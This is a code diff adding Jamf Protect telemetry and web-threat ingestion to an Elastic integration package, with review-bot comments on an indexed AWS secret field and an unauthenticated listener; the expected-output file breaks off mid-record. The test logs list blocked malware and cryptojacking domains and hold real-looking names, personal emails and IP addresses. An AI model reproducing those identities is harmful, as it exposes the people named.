- name: id + type: keyword + - name: processing_time + type: date + - name: size + type: keyword + - name: state + type: keyword + - name: title + type: keyword + - name: user + type: keyword + - name: log + type: group + fields: + - name: file + type: group + fields: + - name: location + type: keyword + - name: max_number_backups + type: long + - name: max_size_mega_bytes + type: long + - name: ownership + type: keyword + - name: permission + type: keyword + - name: remote_endpoint_enabled + type: long + - name: 
remote_endpoint_type + type: keyword + - name: remote_endpoint_type_awskinesis + type: group + fields: + - name: access_key_id + type: keyword + - name: region + type: keyword + - name: secret_key + type: keyword + - name: stream_name + type: keyword + - name: remote_endpoint_url + type: keyword + - name: mach_timestamp + type: keyword + - name: opaque_version + type: keyword + - name: parent_activity_identifier + type: keyword + - name: path + type: keyword + - name: process + type: group + fields: + - name: id + type: long + - name: image + type: group + fields: + - name: path + type: keyword + - name: uuid + type: keyword + - name: project_name + type: keyword + - name: sender + type: group + fields: + - name: id + type: long + - name: image + type: group + fields: + - name: path + type: keyword + - name: uuid + type: keyword + - name: program_counter + type: long + - name: source + type: keyword + - name: source_version + type: keyword + - name: subsystem + type: keyword + - name: timestamp + type: date + - name: timezone_name + type: keyword + - name: thread_id + type: keyword + - name: trace_id + type: keyword + - name: unified_log_predicates + type: keyword + - name: version + type: keyword + - name: event_score + type: long + - name: exec_args + type: group + fields: + - name: args + type: flattened + - name: args_compiled + type: keyword + - name: exec_chain_child + type: group + fields: + - name: parent + type: group + fields: + - name: path + type: text + - name: uuid + type: keyword + - name: exec_chain_parent + type: group + fields: + - name: uuid + type: keyword + - name: exec_env + type: group + fields: + - name: env + type: group + fields: + - name: arch + type: keyword + - name: compiled + type: keyword + - name: malwarebytes_group + type: keyword + - name: path + type: text + - name: shell + type: keyword + - name: ssh_auth_sock + type: keyword + - name: tmpdir + type: keyword + - name: xpc + type: group + fields: + - name: flags + type: keyword + 
- name: service_name + type: keyword + - name: env_compiled + type: keyword + - name: exit + type: group + fields: + - name: return + type: group + fields: + - name: value + type: long + - name: status + type: keyword + - name: file_event_info + type: group + fields: + - name: eventid_wrapped + type: boolean + - name: history_done + type: boolean + - name: item + type: group + fields: + - name: change_owner + type: boolean + - name: cloned + type: boolean + - name: created + type: boolean + - name: extended_attribute_modified + type: boolean + - name: finder_info_modified + type: boolean + - name: inode_metadata_modified + type: boolean + - name: is_directory + type: boolean + - name: is_file + type: boolean + - name: is_hard_link + type: boolean + - name: is_last_hard_link + type: boolean + - name: is_sym_link + type: boolean + - name: removed + type: boolean + - name: renamed + type: boolean + - name: updated + type: boolean + - name: kernel_dropped + type: boolean + - name: mount + type: boolean + - name: must_scan_sub_dir + type: boolean + - name: none + type: boolean + - name: own_event + type: boolean + - name: root_changed + type: boolean + - name: unmount + type: boolean + - name: user_dropped + type: boolean + - name: hardware_event_info + type: group + fields: + - name: device + type: group + fields: + - name: class + type: keyword + - name: name + type: keyword + - name: status + type: keyword + - name: device_attributes + type: group + fields: + - name: io + type: group + fields: + - name: cf_plugin_types + type: flattened + - name: class_name_override + type: keyword + - name: power_management + type: group + fields: + - name: capability_flags + type: keyword + - name: current_power_state + type: long + - name: device_power_state + type: long + - name: driver_power_state + type: long + - name: max_power_state + type: long + - name: iserial_number + type: long + - name: removable + type: keyword + - name: usb + type: group + fields: + - name: 
product_name + type: keyword + - name: vendor_name + type: keyword + - name: header + type: group + fields: + - name: action + type: keyword + - name: event_modifier + type: keyword + - name: time_milliseconds_offset + type: long + - name: version + type: keyword + - name: host_info + type: group + fields: + - name: host + type: group + fields: + - name: uuid + type: keyword + - name: identity + type: group + fields: + - name: cd_hash + type: keyword + - name: signer + type: group + fields: + - name: id + type: keyword + - name: id_truncated + type: keyword + - name: type + type: keyword + - name: team + type: group + fields: + - name: id + type: keyword + - name: id_truncated + type: keyword + - name: path + type: keyword + - name: process + type: group + fields: + - name: effective + type: group + fields: + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: user + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: pid + type: long + - name: name + type: keyword + - name: session + type: group + fields: + - name: id + type: keyword + - name: terminal_id + type: group + fields: + - name: addr + type: keyword + - name: ip_address + type: ip + - name: port + type: long + - name: type + type: keyword + - name: user + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: return + type: group + fields: + - name: description + type: keyword + - name: signal_event_info + type: group + fields: + - name: signal + type: long + - name: socket + type: group + fields: + - name: inet + type: group + fields: + - name: addr + type: keyword + - name: family + type: keyword + - name: id + type: keyword + - name: unix + type: group + fields: + - name: family + type: keyword + - name: path + type: text + - name: subject + type: group + fields: + - name: 
audit + type: group + fields: + - name: id + type: keyword + - name: user + type: group + fields: + - name: name + type: keyword + - name: effective + type: group + fields: + - name: group + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: user + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: process + type: group + fields: + - name: name + type: keyword + - name: pid + type: long + - name: responsible + type: group + fields: + - name: process + type: group + fields: + - name: id + type: keyword + - name: name + type: keyword + - name: session + type: group + fields: + - name: id + type: keyword + - name: terminal_id + type: group + fields: + - name: addr + type: keyword + - name: port + type: long + - name: type + type: keyword + - name: texts + type: keyword +- name: log.source.address + type: keyword + description: Source address from which the log event was read / sent from. diff --git a/packages/jamf_protect/data_stream/telemetry/manifest.yml b/packages/jamf_protect/data_stream/telemetry/manifest.yml new file mode 100644 index 00000000000..b2bda862ff2 --- /dev/null +++ b/packages/jamf_protect/data_stream/telemetry/manifest.yml 
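Review bot: `secret_key` (next to `access_key_id`, `region` and `stream_name`) in the `remote_endpoint_type_awskinesis` group is mapped as an indexed `keyword`, so if Jamf Protect ever reports its Kinesis log-forwarding configuration in a telemetry event the AWS secret is stored in cleartext and searchable by anyone with read access to the data stream; `file_license_info.license_key` has the same shape. The collapsed indentation makes the exact parent hard to confirm, but it appears to sit under `jamf_protect.telemetry.event_attributes.log`. Either leave the field out of the mapping or have the ingest pipeline strip it before indexing, e.g. `- remove: { field: jamf_protect.telemetry.event_attributes.log.remote_endpoint_type_awskinesis.secret_key, ignore_missing: true }` (path to be confirmed against the nesting), and say in the field description that the value is deliberately not retained.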
@@ -0,0 +1,57 @@
+title: Receives Telemetry from Jamf Protect with Elastic Agent.
+type: logs
+streams:
+ - input: http_endpoint
+ template_path: http_endpoint.yml.hbs
+ title: Jamf Protect Telemetry
+ description: Receives Telemetry from Jamf Protect with Elastic Agent.
+ vars:
+ - name: listen_port
+ type: integer
+ title: Listen Port
+ description: The port number the listener binds to.
+ multi: false
+ required: true
+ show_user: true
+ default: 9550
+ - name: url
+ type: text
+ title: URL
+ description: This option specifies which URL path to accept requests on. Defaults to /.
+ multi: false
+ required: false
+ show_user: false
+ default: /
+ - name: tags
+ type: text
+ title: Tags
+ multi: true
+ required: true
+ show_user: false
+ default:
+ - forwarded
+ - jamf_protect-telemetry
+ - name: preserve_original_event
+ required: true
+ show_user: true
+ title: Preserve original event
+ description: Preserves a raw copy of the original event, added to the field `event.original`.
+ type: bool
+ multi: false
+ default: false
+ - name: preserve_duplicate_custom_fields
+ required: true
+ show_user: true
+ title: Preserve duplicate custom fields
+ description: Preserve custom fields for all ECS mappings.
+ type: bool
+ multi: false
+ default: false
+ - name: processors
+ type: yaml
+ title: Processors
+ multi: false
+ required: false
+ show_user: false
+ description: >-
+ Processors are used to reduce the number of fields in the exported event or to enhance the event with metadata. This executes in the agent before the logs are parsed. See [Processors](https://www.elastic.co/guide/en/beats/filebeat/current/filtering-and-enhancing-data.html) for details.
diff --git a/packages/jamf_protect/data_stream/telemetry/sample_event.json b/packages/jamf_protect/data_stream/telemetry/sample_event.json
new file mode 100644
index 00000000000..95d345eff1a
--- /dev/null
+++ b/packages/jamf_protect/data_stream/telemetry/sample_event.json
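Review bot: Nothing in this stream's `vars` lets an operator require a shared secret or TLS on the listener: only `listen_port`, `url`, `tags`, the two `preserve_*` switches and `processors` are declared, so unless the telemetry template (not in this chunk) hardcodes them, the `http_endpoint` input accepts unauthenticated plaintext POSTs on port 9550 from any source and whatever is sent is indexed as Jamf telemetry. The `web_threat_events` template added in the same commit renders `secret.header`, `secret.value` and `ssl` when they are set, so this stream should expose the matching variables, and `listen_address` as well so the bind address is not left to the input's default. Suggested additions to `vars`, in the shape of the existing entries (descriptions are placeholders to be adjusted):

```yaml
      # … unchanged: listen_port, url, tags, preserve_original_event, preserve_duplicate_custom_fields …
      - name: listen_address
        type: text
        title: Listen Address
        description: Bind address for the HTTP endpoint listener.
        multi: false
        required: true
        show_user: true
        default: localhost
      - name: secret_header
        type: text
        title: Secret header
        description: The header name used to authenticate requests from Jamf Protect.
        multi: false
        required: false
        show_user: true
      - name: secret_value
        type: text
        title: Secret value
        description: The value of the secret header; requests that do not carry it are rejected by the input.
        multi: false
        required: false
        show_user: true
      - name: ssl
        type: yaml
        title: TLS
        description: SSL/TLS options for the listener.
        multi: false
        required: false
        show_user: false
      # … unchanged: processors …
```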
@@ -0,0 +1,78 @@ +{ + "@timestamp": "2024-02-06T16:01:34.442Z", + "ecs": { + "version": "8.11.0" + }, + "error": { + "code": "0" + }, + "event": { + "action": "aue_posix_spawn", + "category": [ + "authentication" + ], + "code": "43190", + "kind": "event", + "outcome": "success", + "type": [ + "info" + ] + }, + "host": { + "hostname": "Mac mini", + "id": "H2WGF2U9Q6NV", + "ip": [ + "0.0.0.0" + ], + "os": { + "version": "Version 14.2.1 (Build 23C71)" + } + }, + "process": { + "args": [ + "/usr/bin/profiles", + "status", + "-type", + "enrollment" + ], + "code_signature": { + "signing_id": "com.microsoft.EdgeUpdater", + "team_id": "UBF8T346G9" + }, + "exit_code": 0, + "hash": { + "sha1": "9cfc802baf45b74693d146686ebe9ec59ac6367f" + }, + "real_group": { + "id": "0", + "name": "wheel" + }, + "real_user": { + "id": "4294967295" + }, + "user": { + "id": "0", + "name": "root" + } + }, + "related": { + "hash": [ + "9cfc802baf45b74693d146686ebe9ec59ac6367f" + ], + "hosts": [ + "Mac mini" + ], + "ip": [ + "0.0.0.0" + ], + "user": [ + "root" + ] + }, + "user": { + "id": "0", + "name": [ + "root" + ] + } +} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log new file mode 100644 index 00000000000..12be8625475 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log 
@@ -0,0 +1,8 @@ +{"event":{"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Threat Events Stream"},"timestamp":"2020-01-30T17:47:41.767Z","alertId":"013b15c9-8f62-4bf1-948a-d82367af2a10","account":{"customerId":"fb4567b6-4ee2-3c4c-abb9-4c78ec463b25","parentId":"7c302632-7ac4-4234-8ada-11d76feb3730","name":"Customer"},"device":{"deviceId":"09f81436-de17-441e-a631-0461252c629b","os":"IOS 11.2.5","deviceName":"Apple iPhone 11 (11.2.5)","userDeviceName":"Apple iPhone 11","externalId":"5087dc0e-876c-4b0e-95ea-5b543476e0c4"},"eventType":{"id":213,"description":"Sideloaded App","name":"SIDE_LOADED_APP_IN_INVENTORY"},"app":{"id":"com.apple.iBooks","name":"Books","version":"1.1","sha1":"16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2","sha256":"16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042"},"destination":{"name":"host","ip":"ip","port":80},"source":{"ip":"1.2.3.4","port":3025},"location":"gb","accessPoint":"AccessPoint","accessPointBssid":"c6:9f:db:b1:73:5a","severity":6,"user":{"email":"user@mail.com","name":"John Doe"},"eventUrl":"https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767","action":"Detected"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-11-24T05:46:08.934Z","alertId":"f296bcf0-134a-4df4-8069-ef273fb8c11b","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a0233aa8a1","parentId":"c00asdfs8916-5bad-406e-8ee7-b125460fffecaf3","name":"Jamf Internal Test Tenant"},"device":{"deviceId":"20bae216-4e47-415f-b16f-518d7aadb3dc","os":"MAC_OS 13.5.1","deviceName":"Mac (13.5.1)","userDeviceName":"ryan’s MacBook Pro","externalId":"62193e5b-eb07-5835-8502-89b000578b4f"},"eventType":{"id":"204","description":"Vulnerable 
O/S","name":"OUTDATED_OS"},"app":{},"destination":{},"source":{},"severity":10,"user":{"email":"john.doe@jamf.com","name":"testinguser"},"eventUrl":"https://radar.wandera.com/security/events/detail/f296bcf0-134a-4df4-8069-ef273fb8c11b.OUTDATED_OS?createdUtcMs=1700804768934","action":"Detected"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2024-01-10T12:20:37.059Z","alertId":"8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599","account":{"customerId":"b36f2900-bf35-4661-bd4f-21d66a1199b7","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Portal - Thijs Xhaflaire"},"device":{"deviceId":"32ce61c6-a7b7-400b-b3bb-d048464f47b2","os":"UNKNOWN 14.0.0","deviceName":"Mac (14.0.0)","userDeviceName":"VMAC-HKDV5R2L6","externalId":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"52.92.33.124","name":"malware.threatops.co.uk"},"source":{},"location":"GB","severity":8,"user":{"email":"a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd","name":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventUrl":"https://radar.wandera.com/security/events/detail/8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599.ACCESS_BAD_HOST?createdUtcMs=1704889237059","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2024-01-10T12:20:28.506Z","alertId":"6303f01e-f8fb-4a36-a339-95d721d9bb02","account":{"customerId":"b36f2900-bf35-4661-bd4f-21d66a1199b7","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Portal - Thijs Xhaflaire"},"device":{"deviceId":"32ce61c6-a7b7-400b-b3bb-d048464f47b2","os":"UNKNOWN 14.0.0","deviceName":"Mac (14.0.0)","userDeviceName":"VMAC-HKDV5R2L6","externalId":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventType":{"id":"303","description":"Risky Host/Domain - 
Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"89.238.73.97","name":"eicar.org"},"source":{},"location":"GB","severity":8,"user":{"email":"a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd","name":"43220292-40a8-5b3b-b4ef-94e1adbb720d"},"eventUrl":"https://radar.wandera.com/security/events/detail/6303f01e-f8fb-4a36-a339-95d721d9bb02.ACCESS_BAD_HOST?createdUtcMs=1704889228506","action":"Blocked"}} +{"event":{"metadata":{"schemaVersion":"1.0","vendor":"Jamf","product":"Threat Events Stream"},"timestamp":"2023-02-21T13:10:40.410Z","alertId":"debd2e4b-9da1-454e-952d-18a00b42ffce","account":{"customerId":"777a7e56-e0ae-4bb9-ac2c-47015dcd2c68","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf - CE Security Team"},"device":{"deviceId":"e9671102-5ccf-4e66-a6b3-b117ba257d5f","os":"UNKNOWN 13.2.1","deviceName":"Mac (13.2.1)","userDeviceName":"darrow","externalId":"0c221ae4-50af-5e39-8275-4424cc87ab8e"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{"id":null,"name":null,"version":null,"sha1":null,"sha256":null},"destination":{"name":"secure.eicar.org","ip":"2a00:1828:1000:2497::2","port":null},"source":{"ip":null,"port":null},"location":"GB","accessPoint":null,"accessPointBssid":null,"severity":8,"user":{"email":"allen.golbig@jamfse.io","name":"Allen Golbig"},"eventUrl":"https://radar.wandera.com/security/events/detail/debd2e4b-9da1-454e-952d-18a00b42ffce.ACCESS_BAD_HOST?createdUtcMs=1676985040410","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-12-28T13:36:52.187Z","alertId":"0c925382-dceb-486e-82b4-2a75f259e15e","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf Internal Test Portal - Ryan 
Legg"},"device":{"deviceId":"3453be41-0f2d-4d43-9ec2-a53f39fff93c","os":"IOS 17.2.1","deviceName":"Apple iPhone (17.2.1)","userDeviceName":"c244cb17-6af8-4a62-98b5-9e6f2d3f89dd"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"18.154.219.62","name":"sli.bidagy.com"},"source":{"ip":"107.10.7.168"},"location":"US","severity":8,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"},"eventUrl":"https://radar.wandera.com/security/events/detail/0c925382-dceb-486e-82b4-2a75f259e15e.ACCESS_BAD_HOST?createdUtcMs=1703770612187","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-12-25T12:16:37.261Z","alertId":"e5f479d7-5301-402d-b776-a099e6fab817","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal Test Accounts (root) - Jamf Internal Test Portal - Ryan Legg"},"device":{"deviceId":"cd531c8a-26ed-419a-8fd4-f67702f40ad5","os":"IOS 17.2","deviceName":"Apple iPad (17.2)","userDeviceName":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"},"eventType":{"id":"303","description":"Risky Host/Domain - Malware","name":"ACCESS_BAD_HOST"},"app":{},"destination":{"ip":"45.55.83.107","name":"servedby.aqua-adserver.com"},"source":{"ip":"107.10.7.168"},"location":"US","severity":8,"user":{"email":"hjilling@icloud.com","name":"07a5a2ae-16de-4767-831e-0ea8b7c3abe4"},"eventUrl":"https://radar.wandera.com/security/events/detail/e5f479d7-5301-402d-b776-a099e6fab817.ACCESS_BAD_HOST?createdUtcMs=1703506597261","action":"Blocked"}} +{"event":{"metadata":{"product":"Threat Events Stream","schemaVersion":"1.0","vendor":"Jamf"},"timestamp":"2023-12-11T21:50:47.929Z","alertId":"bbe5c381-0647-4a01-be29-691e7ed908dd","account":{"customerId":"9608556b-0c3a-4a9c-9b4a-d714d8a028a1","parentId":"c00a8916-5bad-406e-8ee7-b125460ecaf3","name":"Jamf Internal 
Test Accounts (root) - Jamf Internal Test Portal - Ryan Legg"},"device":{"deviceId":"3ab4d0f6-2fea-49d5-96e5-0ead0a910378","os":"MAC_OS 12.7.1","deviceName":"Mac (12.7.1)","userDeviceName":"C02RR5V5G8WN","externalId":"76952549-aa61-51f4-9bef-0eaed5484319"},"eventType":{"id":"305","description":"Risky Host/Domain - Cryptojacking","name":"ACCESS_CRYPTOJACKING_HOST"},"app":{},"destination":{"ip":"172.67.201.133","name":"jsecoin.com"},"source":{},"location":"GB","severity":6,"user":{"email":"ab8debf5-38bf-4a71-a7d3-0fca4b6c5a1b@9608556b-0c3a-4a9c-9b4a-d714d8a028a1.wnd","name":"76952549-aa61-51f4-9bef-0eaed5484319"},"eventUrl":"https://radar.wandera.com/security/events/detail/bbe5c381-0647-4a01-be29-691e7ed908dd.ACCESS_CRYPTOJACKING_HOST?createdUtcMs=1702331447929","action":"Blocked"}} \ No newline at end of file diff --git a/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log-expected.json b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log-expected.json new file mode 100644 index 00000000000..d2a05b2c012 --- /dev/null +++ b/packages/jamf_protect/data_stream/web_threat_events/_dev/test/pipeline/test-jamf-protect-threat-sample-logs.log-expected.json 
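Review bot: The sample log carries what look like real identities rather than reserved test values: personal and corporate mailboxes (`hjilling@icloud.com`, `allen.golbig@jamfse.io`, `john.doe@jamf.com`), full names in `account.name` and `user.name`, serial-style device names and public-range source addresses such as `107.10.7.168`. Pipeline fixtures ship with the package, so these should be replaced with documentation values (RFC 5737 address ranges, `example.com` mailboxes, synthetic names) before merge. Separately, the first event uses the literal strings `"ip"` and `"host"` for `destination.ip` and `destination.name`, which the expected output then surfaces as `destination.address: "ip"`, so that record exercises neither the IP nor the domain branch of the pipeline; a well-formed address would make it a meaningful test case.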
@@ -0,0 +1,384 @@ +{ + "expected": [ + { + "destination": { + "address": "ip", + "domain": "host", + "port": 80 + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "013b15c9-8f62-4bf1-948a-d82367af2a10", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Sideloaded App", + "severity": 6, + "start": "2020-01-30T17:47:41.767Z", + "url": "https://radar.wandera.com/security/events/detail/013b15c9-8f62-4bf1-948a-d82367af2a10.SIDE_LOADED_APP_IN_INVENTORY?createdUtcMs=1580406461767" + }, + "file": { + "hash": { + "sha1": "16336078972773bc6c8cef69d722c8c093ba727ddc5bb31eb2", + "sha256": "16336078978a306dc23b67dae9df18bc2a0205e3ff0cbf97c46e76fd670f93fd142d7042" + }, + "name": "Books" + }, + "host": { + "geo": { + "country_iso_code": "gb" + }, + "hostname": "Apple iPhone 11", + "id": "09f81436-de17-441e-a631-0461252c629b", + "os": { + "full": "IOS 11.2.5" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "fb4567b6-4ee2-3c4c-abb9-4c78ec463b25" + }, + "rule": { + "description": "Sideloaded App", + "name": "SIDE_LOADED_APP_IN_INVENTORY" + }, + "source": { + "port": 3025 + }, + "user": { + "email": "user@mail.com", + "name": "John Doe" + } + }, + { + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Detected", + "category": [ + "host" + ], + "id": "f296bcf0-134a-4df4-8069-ef273fb8c11b", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Vulnerable O/S", + "severity": 10, + "start": "2023-11-24T05:46:08.934Z", + "url": "https://radar.wandera.com/security/events/detail/f296bcf0-134a-4df4-8069-ef273fb8c11b.OUTDATED_OS?createdUtcMs=1700804768934" + }, + "host": { + "hostname": "ryan’s MacBook Pro", + "id": "20bae216-4e47-415f-b16f-518d7aadb3dc", + "os": { + "full": "MAC_OS 13.5.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a0233aa8a1" + 
}, + "rule": { + "description": "Vulnerable O/S", + "name": "OUTDATED_OS" + }, + "user": { + "email": "john.doe@jamf.com", + "name": "testinguser" + } + }, + { + "destination": { + "address": "52.92.33.124", + "domain": "malware.threatops.co.uk" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2024-01-10T12:20:37.059Z", + "url": "https://radar.wandera.com/security/events/detail/8cfd4a58-f6bb-45b9-9ca2-ba31d8fba599.ACCESS_BAD_HOST?createdUtcMs=1704889237059" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "VMAC-HKDV5R2L6", + "id": "32ce61c6-a7b7-400b-b3bb-d048464f47b2", + "os": { + "full": "UNKNOWN 14.0.0" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "b36f2900-bf35-4661-bd4f-21d66a1199b7" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd", + "name": "43220292-40a8-5b3b-b4ef-94e1adbb720d" + } + }, + { + "destination": { + "address": "89.238.73.97", + "domain": "eicar.org" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "6303f01e-f8fb-4a36-a339-95d721d9bb02", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2024-01-10T12:20:28.506Z", + "url": "https://radar.wandera.com/security/events/detail/6303f01e-f8fb-4a36-a339-95d721d9bb02.ACCESS_BAD_HOST?createdUtcMs=1704889228506" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "VMAC-HKDV5R2L6", + "id": "32ce61c6-a7b7-400b-b3bb-d048464f47b2", + "os": { + "full": "UNKNOWN 14.0.0" + } + }, + "observer": { + 
"product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "b36f2900-bf35-4661-bd4f-21d66a1199b7" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "a1e001e6-51e1-40aa-ad77-2c67edc77529@b36f2900-bf35-4661-bd4f-21d66a1199b7.wnd", + "name": "43220292-40a8-5b3b-b4ef-94e1adbb720d" + } + }, + { + "destination": { + "address": "2a00:1828:1000:2497::2", + "domain": "secure.eicar.org" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "debd2e4b-9da1-454e-952d-18a00b42ffce", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2023-02-21T13:10:40.410Z", + "url": "https://radar.wandera.com/security/events/detail/debd2e4b-9da1-454e-952d-18a00b42ffce.ACCESS_BAD_HOST?createdUtcMs=1676985040410" + }, + "host": { + "geo": { + "country_iso_code": "GB" + }, + "hostname": "darrow", + "id": "e9671102-5ccf-4e66-a6b3-b117ba257d5f", + "os": { + "full": "UNKNOWN 13.2.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "777a7e56-e0ae-4bb9-ac2c-47015dcd2c68" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "allen.golbig@jamfse.io", + "name": "Allen Golbig" + } + }, + { + "destination": { + "address": "18.154.219.62", + "domain": "sli.bidagy.com" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "0c925382-dceb-486e-82b4-2a75f259e15e", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2023-12-28T13:36:52.187Z", + "url": "https://radar.wandera.com/security/events/detail/0c925382-dceb-486e-82b4-2a75f259e15e.ACCESS_BAD_HOST?createdUtcMs=1703770612187" + }, + "host": { + "geo": { + "country_iso_code": "US" + }, + 
"hostname": "c244cb17-6af8-4a62-98b5-9e6f2d3f89dd", + "id": "3453be41-0f2d-4d43-9ec2-a53f39fff93c", + "os": { + "full": "IOS 17.2.1" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + }, + { + "destination": { + "address": "45.55.83.107", + "domain": "servedby.aqua-adserver.com" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "e5f479d7-5301-402d-b776-a099e6fab817", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Malware", + "severity": 8, + "start": "2023-12-25T12:16:37.261Z", + "url": "https://radar.wandera.com/security/events/detail/e5f479d7-5301-402d-b776-a099e6fab817.ACCESS_BAD_HOST?createdUtcMs=1703506597261" + }, + "host": { + "geo": { + "country_iso_code": "US" + }, + "hostname": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4", + "id": "cd531c8a-26ed-419a-8fd4-f67702f40ad5", + "os": { + "full": "IOS 17.2" + } + }, + "observer": { + "product": "Jamf Protect", + "vendor": "Jamf" + }, + "organization": { + "id": "9608556b-0c3a-4a9c-9b4a-d714d8a028a1" + }, + "rule": { + "description": "Risky Host/Domain - Malware", + "name": "ACCESS_BAD_HOST" + }, + "user": { + "email": "hjilling@icloud.com", + "name": "07a5a2ae-16de-4767-831e-0ea8b7c3abe4" + } + }, + { + "destination": { + "address": "172.67.201.133", + "domain": "jsecoin.com" + }, + "ecs": { + "version": "8.11.0" + }, + "event": { + "action": "Blocked", + "category": [ + "host" + ], + "id": "bbe5c381-0647-4a01-be29-691e7ed908dd", + "kind": "alert", + "provider": "Jamf Protect", + "reason": "Risky Host/Domain - Cryptojacking", + "severity": 6, + "start": 